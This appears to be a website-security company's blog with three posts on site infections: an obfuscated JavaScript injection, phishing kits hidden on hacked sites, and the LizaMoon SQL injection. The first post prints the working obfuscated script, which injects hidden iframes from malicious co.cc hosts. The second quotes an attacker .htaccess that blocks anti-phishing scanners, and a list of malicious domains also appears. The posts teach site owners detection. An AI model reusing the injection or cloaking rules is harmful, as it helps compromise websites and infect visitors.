WeWatchYourWebsite

"so you don't have to!"

By

The latest website infection

We’re seeing more and more obfuscated javascript infections recently.

The latest one:


y='rum';n='s';fp='afe';e='tp';bo='/f';lk='o.c';bl='742';x='7';i='ra';h='c';gf='.';
fl='ht';q='//';w='c';pu='554';mk='p?';qg='tp=';il='ph';yy='o';am='5e';k='.c';c='me';
u='r';d='20a';qd='1';z='prw';xu='if';iy='a';f=':';a=xu.concat(i,c);kx=n.concat
(u,h);l=fl.concat(e,f,q,z,qd,k,lk,w,bo,yy,y,gf,il,mk,qg,bl,d,am,pu,fp,iy,x);var
ov=document.createElement(a);ov.setAttribute('width','5');ov.setAttribute
('height','5');ov.setAttribute('style','display:none');ov.setAttribute
(kx,l);document.body.appendChild(ov);lb='r';r='d3b';q='.c';b='or';v='e';
bi='e30';gl='?';j='c/f';ru='l';pj='a';zh='m.';h='a';xc='me';i='c';z='tp:';n='4';ye='=';
lg='s';qk='426';jp='ht';g='a';k='z';ut='u';c='//p';pr='7f';o='i';by='fr';ck='3';pl='php';
pe='tp';e='a';nc='.co';gz=o.concat(by,h,xc);kx=lg.concat(lb,i);dv=jp.concat
(z,c,k,ru,ck,nc,q,j,b,ut,zh,pl,gl,pe,ye,v,pj,r,e,qk,pr,bi,g,n);var bo=document.createElement(gz);
bo.setAttribute('width','5');bo.setAttribute('height','5');bo.setAttribute('style','display:none');
bo.setAttribute(kx,dv);document.body.appendChild(bo);

deobfuscates to:

iframe setAttribute src = hxxp: //prw1.co.cc/forum.php?tp=74220a5e554afea7

and:

iframe setAttribute src = hxxp://pzl3.co.cc/forum.php?tp=ead3ba4267fe30a4

Which are listed as suspicious by Google:

What is the current listing status for prw1.co.cc?

Site is listed as suspicious – visiting this web site may harm your computer.

Part of this site was listed for suspicious activity 2 time(s) over the past 90 days.

What happened when Google visited this site?

Of the 5 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2011-04-09, and the last time suspicious content was found on this site was on 2011-04-08.
Malicious software includes 440 scripting exploit(s).

and…

What is the current listing status for pzl3.co.cc?

Site is listed as suspicious – visiting this web site may harm your computer.

Part of this site was listed for suspicious activity 1 time(s) over the past 90 days.

What happened when Google visited this site?

Of the 4 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2011-04-27, and the last time suspicious content was found on this site was on 2011-04-27.
Malicious software includes 334 scripting exploit(s).

In gathering data and searching for the source of the vulnerability that leads to this infection on websites (now totaling about 38,500), there is no common denominator with the infected websites.

It doesn’t appear to be WordPress or Joomla or osCommerce or any of the other popular website packages.

It might be more stolen FTP login credentials.

If you have further information on this, please post here, or email me at traef@wewatchyourwebsite.com.

Thank you.

By

Let’s go phishing

A fishing buddy of mine describes fishing as, “a jerk on one end of the line, waiting for a jerk on the other end”.

As we have been “beefing-up” our phishing detection, I started thinking about my friend’s comment. Couldn’t phishing be described the same way?

We talk with people everyday who’s websites have been infected by hackers and quite often we hear, “What do these jerks want with my website?” So there is a jerk on one end of the line, waiting for a jerk (or unsuspecting person) on the other end.

Phishing as you probably know, is the act of “fooling” someone into providing their Personally Identifiable Information (PII). In the early days of phishing, you would get an email that may have had all the correct graphics to make it look legitimate, however, there would typically be common mispelled words and other grammatical errors that would indicate that something was amiss.

Now days, the emails look legitimate and so do the websites that are linked to, from the bogus emails.

You may see emails with subject lines like, “PayPal security alert”, or “Attempted change to your banking login”, in order to alarm you into action.

In this post, I’m going to educate you on what hackers do to websites to get them ready for phishing.

First, realize that when a website is compromised (hacked) by someone, they have many options:

  • They can inject a script that attempts to infect the computer of any of your visitors
  • They can store their games and other illegally obtained software on the site
  • They can add phishing files and use the compromised site to steal PII
  • Or, in worst case scenarios, they delete all the files to cover their tracks
  • For now, we’re going to focus on using compromised sites for phishing.

    When the hackers turn their attention to phishing, they want to hide their “work” from prying eyes, but yet make it widely available to their potential victims.

    How to determine if your website is being used for phishing?

    We typically find the phishing files deep inside a multiple level folder structure. It’s not unusual for us to find phishing files buried 10 sub-folders (directories) deep on a website. It’s so common that you could almost classify it as a characteristic of phishing files.

    Hackers are so determined to keep their phishing files hidden that they even protect them. We’ve found on numerous sites where the hackers have used a .htaccess file to help keep their files hidden.

    Some of the entries in an .htaccess file are:

    setenvifnocase Referer castlecops.com spammer=yes
    setenvifnocase Referer internetidentity.com spammer=yes
    setenvifnocase Referer phishfighting.com spammer=yes
    setenvifnocase Referer phishtank.com spammer=yes
    setenvifnocase Referer spamcop.net spammer=yes
    setenvifnocase Referer spam spammer=yes
    setenvifnocase Referer phish spammer=yes
    setenvifnocase Referer bezeqint.net spammer=yes

    Order Allow,Deny
    Allow from all
    Deny from env=spammer

    Let me explain.

    Castlecops.com, InternetIdentity.com, Phishfighting.com, Phishtank.com and Spamcop.net all scan the Internet looking for phishing pages. This .htaccess says that if the referer is one of these sites, then identify that traffic as spam (spammer=yes). The Order Allow,Deny section says to allow all traffic (Allow from all), but deny any visitors previously identified as being a spammer.

    Of course these sites are not spammers, but that’s what the hacker has identified them as for their own protection. Also, the hackers believe that if someone, such as yourself, looks inside this file, you may just think it’s some security measure and leave it alone.

    If you get an email from one of the above organizations, you may want to check your website files for phishing folders.

    Some strings to search for are:

    hsbcMainContent
    HSBC Premier
    By United 4U
    online.lloydstsb.co.uk
    Personal Banking Online Verification
    Lloyds TSB FullZ By GhostRideR
    internetbanking
    $annualIncome
    OnlineBankingRegistration
    Northern Rock Online
    Your mother’s maiden name
    Your Security Number
    Barclays Secure Form
    Log in to Digital Banking
    RBS Refund Form

    There are many, many others but this should get you started.

    If you have any questions about phishing, or identifying phishing files on your website, please email me at traef@wewatchyourwebsite.com.

    If you have any information about phishing that you’d like to share, please leave a comment.

By

The Lizamoon Website Infection

It was reported by Websense here about a new infection that’s hit thousands of websites.

This infection is referred to as LizaMoon because that is the first, and most popular domain seen in this infection. I think, instead of lizamoon, it could be referred to as the “ur.php” infection, but that’s just my opinion.

You can tell if your website has this if any of your pages, when viewed through a browser, have code inserted that looks like:

lizamoon sql injection

Some common traits that are interesting to note are:

1. The script tags have the < and > code instead of the “<" and ">”
2. The inserted code appears in the title tag
3. The inserted code appears in many drop-down listings
4. The infection appears to be only in .asp, .aspx and .cfm web pages

Many of these traits do lead to an apparent SQL injection due to where they’re located in the rendered webpage. Websense commented on their blog that this might be tracked to a vulnerability in Microsoft’s SQL 2003 and 2005. We don’t doubt their findings, but we could not confirm that ourselves, however, seeing that the infected sites are based on either ASP(X) or Cold Fusion, it does lead us to believe this.

Other domains used in this infection:
alexblane.com
alisa-carter.com
milapop.com
eva-marine.info
tadygus.com
google-stats49.info
google-stats45.info
google-stats50.info
stats-master99.info
world-of-books.com
tzy-stats.info
agasi-story.info

…and many others and the list will definitely be changing as this moves forward.

Many of the sites used as redirections in this infection are the fake anti-virus based websites where they (the hackers) try to trick the visitor into believing their PC is infected.

At the time we investigated this, we found that the fake anti-virus software these sites attempt to install on a visitor’s PC is known as “Windows Stability Center”. Currently this is only detected by 13 out of 43 different anti-virus programs – so it’s effectiveness could be quite high.

To check your website, you could either perform SQL queries or export your database and do text search for the string: “ur.php” as that file seems associated with all the domains used in this infection.

Whether you want to call this the Lizamoon infection or use my suggestion of the “ur.php” infection, it’s infecting thousands of websites. As of this writing a Google search on the above script string shows 531,000 results.

Please comment on what you think about this. Have you been infected by this? Anyone have further insight?